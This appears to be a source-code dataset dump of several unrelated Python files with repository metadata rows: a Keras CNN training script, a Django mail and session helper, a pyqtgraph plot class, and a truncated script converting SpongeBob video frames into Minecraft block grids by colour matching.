tot_idx.extend(neg_idx)
else:
tot_idx = neg_idx
for i in range(int(acc_cnt)):
tot_idx.extend(pos_idx)
random.shuffle(tot_idx)
new_x = []
new_y = []
new_tl = []
for idx in tot_idx:
new_x.append(x[idx])
new_y.append(y[idx])
new_tl.append(tl[idx])
return new_x, new_y, new_tl
def data_load(train_list, test_list):
train_x = []; train_y = []; train_tl = []
for tf in train_list:
x, y, tl = data_load_module(tf)
train_x.extend(x); train_y.extend(y); train_tl.extend(tl)
train_x, train_y, train_tl = rejection(train_x, train_y, train_tl)
test_x = []; test_y = []; test_tl = []
for tf in test_list:
x, y, tl = data_load_module(tf)
test_x.extend(x); test_y.extend(y); test_tl.extend(tl)
return train_x, train_y, train_tl, test_x, test_y, test_tl
def fold_data_load(i):
train_x = []; train_y = []; train_tl = []
def create_model(ipt_dim):
model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=(ipt_dim, ipt_dim, 1)))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.25))
model.add(Dense(2, activation='softmax'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['binary_accuracy'])
return model
def performance_generator(tp, tn, fp, fn):
sen = tp / (tp + fn) if (tp + fn) > 0 else 0
spe = tn / (tn + fp) if (tn + fp) > 0 else 0
ppv = tp / (tp + fp) if (tp + fp) > 0 else 0
npv = tn / (tn + fn) if (tn + fn) > 0 else 0
npd = (sen + spe) / 2
acc = (tp + tn) / (tp + tn + fp + fn)
return [sen, spe, ppv, npv, npd, acc]
def counter(y):
pc = 0; nc = 0
for i in range(len(y)):
if round(y[i][0]) == 0:
pc += 1
else:
nc += 1
return pc, nc
def get_pred_perfomance(test_y, pred_y, time_line):
tp = 0; tn = 0; fp = 0; fn = 0;
tpt = 0; tnt = 0; fpt = 0; fnt = 0;
for i in range(len(pred_y)):
cp = round(pred_y[i][0])
ca = test_y[i][0]
if cp == ca:
if cp == 0:
tp += 1
tpt += time_line[i]
else:
tn += 1
tnt += time_line[i]
else:
if cp == 0:
fp += 1
fpt += time_line[i]
else:
fn += 1
fnt += time_line[i]
ca = performance_generator(tp, tn, fp, fn)
ta = performance_generator(tpt, tnt, fpt, fnt)
cs = str(tp) + ',' + str(tn) + ',' + str(fp) + ',' + str(fn)
for v in ca:
cs += ',' + str(v)
ts = str(tpt) + ',' + str(tnt) + ',' + str(fpt) + ',' + str(fnt)
for v in ta:
ts += ',' + str(v)
print('Count:' + cs)
print('Time:' + ts)
return cs + ',' + ts
def read_1_file(file, pos):
pid = file.split('.')[0].split('/')[-1]
f = open('int/'+pid+'_1_int_rev.csv')
lines = f.readlines()
f.close()
arr = np.load('npy/'+str(pos)+'/'+file)
x = []; y = []; tl = [];
for line in lines:
sl = line.split(',')
sid = int(sl[0])
if int(sl[1]) == 1:
y.append([1, 0])
else:
y.append([0, 1])
tl.append(float(sl[2]))
x.append(arr[sid])
return x, y, tl
def read_module(pos):
files = os.listdir('npy/' + str(pos))
test_x = []; test_y = []; test_tl = [];
train_x = []; train_y = []; train_tl = [];
for file in files:
if 'rep' in file:
if 'non' in file:
x, y, tl = read_1_file(file, pos)
test_x.extend(x); test_y.extend(y); test_tl.extend(tl)
else:
x, y, tl = read_1_file(file, pos)
train_x.extend(x); train_y.extend(y); train_tl.extend(tl)
return [train_x, train_y, train_tl], [test_x, test_y, test_tl]
if __name__=='__main__':
pos = 2
print(str(pos))
train, test = read_module(pos)
model = create_model(64)
model.fit(np.array(train[0]), np.array(train[1]), validation_data=(np.array(test[0]), np.array(test[1])), epochs=50)
model.save('net/CNN/'+str(pos)+'_CNN50.net')
pred = model.predict(np.array(test[0]))
sentence = get_pred_perfomance(test[1], pred, test[2])
pen = open('CNN_result.csv', 'a')
pen.write('\n' + str(pos) + ',' + sentence)
pen.close()
| 26.832461
| 118
| 0.575415
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 301
| 0.058732
|
af688d46de52f6336abb6ee7980f7d6335c0a120
| 569
|
py
|
Python
|
django/company/util/models.py
|
shortintern2020-A-labyrinth/TeamD
|
64245c837afd5c19f6383c5c68320ee4d1693021
|
[
"WTFPL"
] | 4
|
2020-08-21T05:09:23.000Z
|
2020-09-10T14:27:22.000Z
|
django/company/util/models.py
|
shortintern2020-A-labyrinth/TeamD
|
64245c837afd5c19f6383c5c68320ee4d1693021
|
[
"WTFPL"
] | 46
|
2020-08-21T07:00:10.000Z
|
2020-08-27T20:26:55.000Z
|
django/company/util/models.py
|
shortintern2020-A-labyrinth/TeamD
|
64245c837afd5c19f6383c5c68320ee4d1693021
|
[
"WTFPL"
] | null | null | null |
from django.core.mail import send_mail
from django.http import HttpResponse
from session.redis import SessionRedis
# Create your models here.
# 一応テスト用に引数デフォルトで設定
def post_mail(subject="題名", from_email="A4sittyo@gmail.com", to_email=["naoki@mail.com"], body="本文"):
send_mail(subject, body, from_email, to_email)
return HttpResponse('<h1>email send complete.</h1>')
# 中原航大
# company_idの取得
def get_company_id(token):
# sessionからvalueを取得
sessionRedis = SessionRedis()
str_time, company_id = sessionRedis.get(token)
return str_time, company_id
| 25.863636
| 101
| 0.752197
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 226
| 0.355906
|
af68e340a99686bea5c7fac8eebb634ebfbce94a
| 657
|
py
|
Python
|
gui/objects/graph/line_plot.py
|
abraker95/ultimate_osu_analyzer
|
bea58c997d13c3f461ccbe682f52799f0f88fdea
|
[
"MIT"
] | 23
|
2019-02-27T06:20:15.000Z
|
2022-03-31T22:54:11.000Z
|
gui/objects/graph/line_plot.py
|
abraker95/ultimate_osu_analyzer
|
bea58c997d13c3f461ccbe682f52799f0f88fdea
|
[
"MIT"
] | 38
|
2019-03-03T17:35:39.000Z
|
2021-08-23T20:43:34.000Z
|
gui/objects/graph/line_plot.py
|
abraker95/ultimate_osu_analyzer
|
bea58c997d13c3f461ccbe682f52799f0f88fdea
|
[
"MIT"
] | 4
|
2020-03-30T20:43:14.000Z
|
2022-03-06T19:40:15.000Z
|
from pyqtgraph.Qt import QtGui, QtCore
import pyqtgraph
import numpy as np
class LinePlot(pyqtgraph.PlotCurveItem):
def __init__(self):
super().__init__()
def update_data(self, data_x, data_y):
if type(data_x) == type(None) or type(data_y) == type(None):
self.setData(x=[], y=[])
return
# Filter out infinities
inf_filter = np.isfinite(data_y.astype(np.float64))
data_x, data_y = data_x[inf_filter], data_y[inf_filter]
self.setData(x=data_x, y=data_y)
return data_x, data_y
def update_xy(self, data_x, data_y):
self.setData(x=data_x, y=data_y)
| 24.333333
| 68
| 0.630137
| 579
| 0.881279
| 0
| 0
| 0
| 0
| 0
| 0
| 23
| 0.035008
|
af69c8ebfb3a3b4a0f27bd8ba4d232051770a3d4
| 38,140
|
py
|
Python
|
spongebob_images/spongebob_rgb_values.py
|
JuicySeals/mc-spongebob-plugin
|
0df8d8e53705540314ebe6ef6ca411654bbeb56c
|
[
"MIT"
] | null | null | null |
spongebob_images/spongebob_rgb_values.py
|
JuicySeals/mc-spongebob-plugin
|
0df8d8e53705540314ebe6ef6ca411654bbeb56c
|
[
"MIT"
] | null | null | null |
spongebob_images/spongebob_rgb_values.py
|
JuicySeals/mc-spongebob-plugin
|
0df8d8e53705540314ebe6ef6ca411654bbeb56c
|
[
"MIT"
] | null | null | null |
from PIL import Image
from math import sqrt
import os
import time
import json
os.system('cls')
COLORS = {
"blocks_rgb":[
[
224,
220,
200
],
[
107,
88,
57
],
[
146,
99,
86
],
[
158,
164,
176
],
[
18,
18,
18
],
[
115,
115,
115
],
[
119,
85,
59
],
[
122,
122,
122
],
[
103,
121,
103
],
[
8,
10,
15
],
[
44,
46,
143
],
[
96,
59,
31
],
[
21,
119,
136
],
[
54,
57,
61
],
[
73,
91,
36
],
[
35,
137,
198
],
[
94,
168,
24
],
[
169,
48,
159
],
[
224,
97,
0
],
[
213,
101,
142
],
[
100,
31,
156
],
[
142,
32,
32
],
[
207,
213,
214
],
[
240,
175,
21
],
[
97,
219,
213
],
[
129,
140,
143
],
[
134,
96,
67
],
[
81,
217,
117
],
[
109,
128,
116
],
[
225,
230,
170
],
[
221,
223,
165
],
[
67,
30,
32
],
[
47,
64,
139
],
[
119,
106,
85
],
[
52,
118,
125
],
[
83,
90,
93
],
[
117,
142,
67
],
[
94,
164,
208
],
[
162,
197,
55
],
[
208,
100,
191
],
[
154,
147,
91
],
[
235,
154,
181
],
[
109,
48,
152
],
[
181,
59,
53
],
[
188,
212,
202
],
[
234,
192,
88
],
[
143,
118,
69
],
[
249,
236,
78
],
[
143,
139,
124
],
[
125,
173,
255
],
[
165,
194,
245
],
[
219,
219,
219
],
[
135,
130,
126
],
[
38,
67,
137
],
[
102,
112,
134
],
[
105,
99,
89
],
[
52,
40,
23
],
[
206,
206,
201
],
[
87,
67,
26
],
[
102,
81,
49
],
[
45,
28,
12
],
[
141,
145,
36
],
[
113,
88,
73
],
[
111,
54,
52
],
[
100,
67,
50
],
[
20,
18,
29
],
[
169,
91,
51
],
[
61,
39,
18
],
[
195,
179,
123
],
[
154,
110,
77
],
[
156,
127,
78
],
[
103,
77,
46
],
[
236,
233,
226
],
[
125,
84,
79
],
[
171,
27,
9
],
[
70,
43,
26
],
[
132,
107,
107
],
[
215,
208,
154
],
[
216,
209,
157
],
[
219,
211,
161
],
[
84,
64,
51
],
[
125,
125,
125
],
[
122,
122,
122
],
[
114,
119,
106
],
[
130,
131,
131
],
[
133,
133,
134
],
[
179,
179,
182
],
[
183,
183,
185
],
[
153,
113,
98
],
[
159,
114,
98
],
[
20,
21,
25
],
[
53,
57,
157
],
[
114,
71,
40
],
[
21,
137,
145
],
[
62,
68,
71
],
[
84,
109,
27
],
[
58,
175,
217
],
[
112,
185,
25
],
[
189,
68,
179
],
[
240,
118,
19
],
[
237,
141,
172
],
[
121,
42,
172
],
[
160,
39,
34
],
[
233,
236,
236
],
[
248,
197,
39
]
],
"224 220 200":[
"bone_block"
],
"107 88 57":[
"bookshelf"
],
"146 99 86":[
"bricks"
],
"158 164 176":[
"clay"
],
"18 18 18":[
"coal_block"
],
"115 115 115":[
"coal_ore"
],
"119 85 59":[
"coarse_dirt"
],
"122 122 122":[
"cobblestone"
],
"103 121 103":[
"mossy_cobblestone"
],
"8 10 15":[
"black_concrete"
],
"44 46 143":[
"blue_concrete"
],
"96 59 31":[
"brown_concrete"
],
"21 119 136":[
"cyan_concrete"
],
"54 57 61":[
"gray_concrete"
],
"73 91 36":[
"green_concrete"
],
"35 137 198":[
"light_blue_concrete"
],
"94 168 24":[
"lime_concrete"
],
"169 48 159":[
"magenta_concrete"
],
"224 97 0":[
"orange_concrete"
],
"213 101 142":[
"pink_concrete"
],
"100 31 156":[
"purple_concrete"
],
"142 32 32":[
"red_concrete"
],
"207 213 214":[
"white_concrete"
],
"240 175 21":[
"yellow_concrete"
],
"97 219 213":[
"diamond_block"
],
"129 140 143":[
"diamond_ore"
],
"134 96 67":[
"dirt"
],
"81 217 117":[
"emerald_block"
],
"109 128 116":[
"emerald_ore"
],
"225 230 170":[
"end_stone_bricks"
],
"221 223 165":[
"end_stone"
],
"67 30 32":[
"black_glazed_terracotta"
],
"47 64 139":[
"blue_glazed_terracotta"
],
"119 106 85":[
"brown_glazed_terracotta"
],
"52 118 125":[
"cyan_glazed_terracotta"
],
"83 90 93":[
"gray_glazed_terracotta"
],
"117 142 67":[
"green_glazed_terracotta"
],
"94 164 208":[
"light_blue_glazed_terracotta"
],
"162 197 55":[
"lime_glazed_terracotta"
],
"208 100 191":[
"magenta_glazed_terracotta"
],
"154 147 91":[
"orange_glazed_terracotta"
],
"235 154 181":[
"pink_glazed_terracotta"
],
"109 48 152":[
"purple_glazed_terracotta"
],
"181 59 53":[
"red_glazed_terracotta"
],
"188 212 202":[
"white_glazed_terracotta"
],
"234 192 88":[
"yellow_glazed_terracotta"
],
"143 118 69":[
"glowstone"
],
"249 236 78":[
"gold_block"
],
"143 139 124":[
"gold_ore"
],
"125 173 255":[
"ice"
],
"165 194 245":[
"packed_ice"
],
"219 219 219":[
"iron_block"
],
"135 130 126":[
"iron_ore"
],
"38 67 137":[
"lapis_block"
],
"102 112 134":[
"lapis_ore"
],
"105 99 89":[
"acacia_wood"
],
"52 40 23":[
"dark_oak_wood"
],
"206 206 201":[
"birch_wood"
],
"87 67 26":[
"jungle_wood"
],
"102 81 49":[
"oak_wood"
],
"45 28 12":[
"spruce_wood"
],
"141 145 36":[
"melon"
],
"113 88 73":[
"mycelium"
],
"111 54 52":[
"netherrack"
],
"100 67 50":[
"note_block"
],
"20 18 29":[
"obsidian"
],
"169 91 51":[
"acacia_planks"
],
"61 39 18":[
"dark_oak_planks"
],
"195 179 123":[
"birch_planks"
],
"154 110 77":[
"jungle_planks"
],
"156 127 78":[
"oak_planks"
],
"103 77 46":[
"spruce_planks"
],
"236 233 226":[
"quartz_block"
],
"125 84 79":[
"nether_quartz_ore"
],
"171 27 9":[
"redstone_block"
],
"70 43 26":[
"redstone_lamp"
],
"132 107 107":[
"redstone_ore"
],
"215 208 154":[
"sandstone"
],
"216 209 157":[
"sandstone"
],
"219 211 161":[
"sandstone"
],
"84 64 51":[
"soul_sand"
],
"125 125 125":[
"stone"
],
"114 119 106":[
"mossy_stone_bricks"
],
"130 131 131":[
"andesite"
],
"133 133 134":[
"polished_andesite"
],
"179 179 182":[
"diorite"
],
"183 183 185":[
"polished_diorite"
],
"153 113 98":[
"granite"
],
"159 114 98":[
"polished_granite"
],
"20 21 25":[
"black_wool"
],
"53 57 157":[
"blue_wool"
],
"114 71 40":[
"brown_wool"
],
"21 137 145":[
"cyan_wool"
],
"62 68 71":[
"gray_wool"
],
"84 109 27":[
"green_wool"
],
"58 175 217":[
"light_blue_wool"
],
"112 185 25":[
"lime_wool"
],
"189 68 179":[
"magenta_wool"
],
"240 118 19":[
"orange_wool"
],
"237 141 172":[
"pink_wool"
],
"121 42 172":[
"purple_wool"
],
"160 39 34":[
"red_wool"
],
"233 236 236":[
"white_wool"
],
"248 197 39":[
"yellow_wool"
]
}
# INSERT VARIABLES HERE
EPISODE_STRING = "ten"
SEASON_NUM = "01"
EPISODE_NUM = "10"
BEGINNING_FRAME = 104
EPISODE_FRAMES = 1414
#
# do this tmr
frame_rgb_data1 = {}
frame_rgb_data2 = {}
frame_rgb_data3 = {}
frame_rgb_data4 = {}
frame_rgb_data5 = {}
frame_rgb_data6 = {}
frame_rgb_data7 = {}
frame_rgb_data8 = {}
frame_rgb_data9 = {}
frame_rgb_data10 = {}
frame_rgb_data11 = {}
# spongebob frames
# 15-103 frames is the title sequence :D
for spongebob_frame in range(BEGINNING_FRAME, EPISODE_FRAMES+1):
os.system('cls')
print(f"On frame: {spongebob_frame}")
frame_string_string = ""
if spongebob_frame < 10:
frame_string_string = f"000{spongebob_frame}"
elif spongebob_frame < 100:
frame_string_string = f"00{spongebob_frame}"
elif spongebob_frame < 1000:
frame_string_string = f"0{spongebob_frame}"
else:
frame_string_string = f"{spongebob_frame}"
while not os.path.exists(f"./ep_{EPISODE_STRING}/images/{frame_string_string}.png"):
for i in reversed(range(1, 16)):
os.system('cls')
print(f"On frame: {frame_string_string}")
print(f"Waiting {i} seconds for the image to get downloaded...")
time.sleep(1)
os.system('cls')
print(f"On frame: {frame_string_string}")
testimage = Image.open(f"./ep_{EPISODE_STRING}/images/{frame_string_string}.png")
height = testimage.height
width = testimage.width
testimage_rgb = testimage.convert("RGB")
if height+4>=255:
print("Image is too big!")
exit()
def closest_color(rgb):
r, g, b = rgb
color_diffs = []
for color in COLORS["blocks_rgb"]:
cr, cg, cb = color
color_diff = sqrt(abs(r - cr)**2 + abs(g - cg)**2 + abs(b - cb)**2)
color_diffs.append((color_diff, color))
return min(color_diffs)[1]
made_changes = False
for y in range(0, height):
for x in range(0, width):
if spongebob_frame < 135:
if not frame_string_string in frame_rgb_data1:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data1[frame_string_string] = []
frame_rgb_data1[frame_string_string].append([])
frame_rgb_data1[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data1[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data1[frame_string_string].append([])
frame_rgb_data1[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data1[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data1[frame_string_string][y].append(get_block)
made_changes = True
elif spongebob_frame < 270:
if not frame_string_string in frame_rgb_data2:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data2[frame_string_string] = []
frame_rgb_data2[frame_string_string].append([])
frame_rgb_data2[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data2[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data2[frame_string_string].append([])
frame_rgb_data2[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data2[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data2[frame_string_string][y].append(get_block)
made_changes = True
elif spongebob_frame < 405:
if not frame_string_string in frame_rgb_data3:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data3[frame_string_string] = []
frame_rgb_data3[frame_string_string].append([])
frame_rgb_data3[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data3[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data3[frame_string_string].append([])
frame_rgb_data3[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data3[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data3[frame_string_string][y].append(get_block)
made_changes = True
elif spongebob_frame < 540:
if not frame_string_string in frame_rgb_data4:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data4[frame_string_string] = []
frame_rgb_data4[frame_string_string].append([])
frame_rgb_data4[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data4[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data4[frame_string_string].append([])
frame_rgb_data4[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data4[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data4[frame_string_string][y].append(get_block)
made_changes = True
elif spongebob_frame < 675:
if not frame_string_string in frame_rgb_data5:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data5[frame_string_string] = []
frame_rgb_data5[frame_string_string].append([])
frame_rgb_data5[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data5[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data5[frame_string_string].append([])
frame_rgb_data5[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data5[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data5[frame_string_string][y].append(get_block)
made_changes = True
elif spongebob_frame < 810:
if not frame_string_string in frame_rgb_data6:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data6[frame_string_string] = []
frame_rgb_data6[frame_string_string].append([])
frame_rgb_data6[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data6[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data6[frame_string_string].append([])
frame_rgb_data6[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data6[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data6[frame_string_string][y].append(get_block)
made_changes = True
elif spongebob_frame < 945:
if not frame_string_string in frame_rgb_data7:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data7[frame_string_string] = []
frame_rgb_data7[frame_string_string].append([])
frame_rgb_data7[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data7[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data7[frame_string_string].append([])
frame_rgb_data7[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data7[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data7[frame_string_string][y].append(get_block)
made_changes = True
elif spongebob_frame < 1080:
if not frame_string_string in frame_rgb_data8:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data8[frame_string_string] = []
frame_rgb_data8[frame_string_string].append([])
frame_rgb_data8[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data8[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data8[frame_string_string].append([])
frame_rgb_data8[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data8[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data8[frame_string_string][y].append(get_block)
made_changes = True
elif spongebob_frame < 1215:
if not frame_string_string in frame_rgb_data9:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data9[frame_string_string] = []
frame_rgb_data9[frame_string_string].append([])
frame_rgb_data9[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data9[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data9[frame_string_string].append([])
frame_rgb_data9[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data9[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data9[frame_string_string][y].append(get_block)
made_changes = True
elif spongebob_frame < 1350:
if not frame_string_string in frame_rgb_data10:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data10[frame_string_string] = []
frame_rgb_data10[frame_string_string].append([])
frame_rgb_data10[frame_string_string][0].append(get_block)
made_changes = True
elif len(frame_rgb_data10[frame_string_string]) == y:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data10[frame_string_string].append([])
frame_rgb_data10[frame_string_string][y].append(get_block)
made_changes = True
elif len(frame_rgb_data10[frame_string_string][y]) + 1 > x:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data10[frame_string_string][y].append(get_block)
made_changes = True
else:
if not frame_string_string in frame_rgb_data11:
rgbpixel = testimage_rgb.getpixel((x,y))
red = rgbpixel[0]
green = rgbpixel[1]
blue = rgbpixel[2]
closestcolor = closest_color((red, green, blue))
get_block_key = f"{closestcolor[0]} {closestcolor[1]} {closestcolor[2]}"
get_block = COLORS[get_block_key][0]
frame_rgb_data11[frame_string_string] = []
frame_rgb_data11[frame_string_string].append([])
frame_rgb_data11[frame_string_string][0].append(get_block)
made_changes = True
